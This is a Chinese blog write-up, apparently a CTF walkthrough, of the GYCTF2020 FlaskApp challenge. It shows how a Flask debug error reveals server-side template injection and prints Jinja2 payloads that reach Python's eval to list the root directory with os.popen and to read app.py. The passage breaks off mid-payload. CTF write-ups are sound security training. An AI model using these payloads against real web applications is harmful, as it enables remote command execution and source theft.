[GYCTF2020]FlaskApp

最新推荐文章于 2025-02-25 12:54:48 发布

切谁怕谁

最新推荐文章于 2025-02-25 12:54:48 发布

阅读量556

点赞数

CC 4.0 BY-SA版权

分类专栏： buu

本文链接：https://blog.youkuaiyun.com/missht0/article/details/113482195

该博客主要讨论了GYCTF2020中FlaskApp挑战的问题。作者指出，官方提示暗示需要利用Flask应用的debug模式，此模式会在发生错误时提供详细的异常信息。通过尝试base64解密并故意输入错误字符串，引发了解码错误，揭示了可能存在的服务器端模板注入（SSTI）漏洞。尽管应用对某些关键词进行了过滤，但作者提到了使用字符拼接方法来规避过滤，进一步探讨了Flask模板注入的利用技巧。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

[GYCTF2020]FlaskApp

在这里插入图片描述
官方write up说看到根据hint1，失败乃成功之母，应该能想到flask的debug模式。
debug模式的情况下可以抛出详细异常信息
base64解密界面随意输入字符串，导致解码报错

在这里插入图片描述
提示存在ssti注入
flask模板注入框架

查看根目录
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{
  
  { c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()")}}{% endif %}{% endfor %}

在这里插入图片描述

读源码
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{
  
  { c.__init__.__globals__['__builtins__'].open('app.py','r').read()}}{% endif %}{% e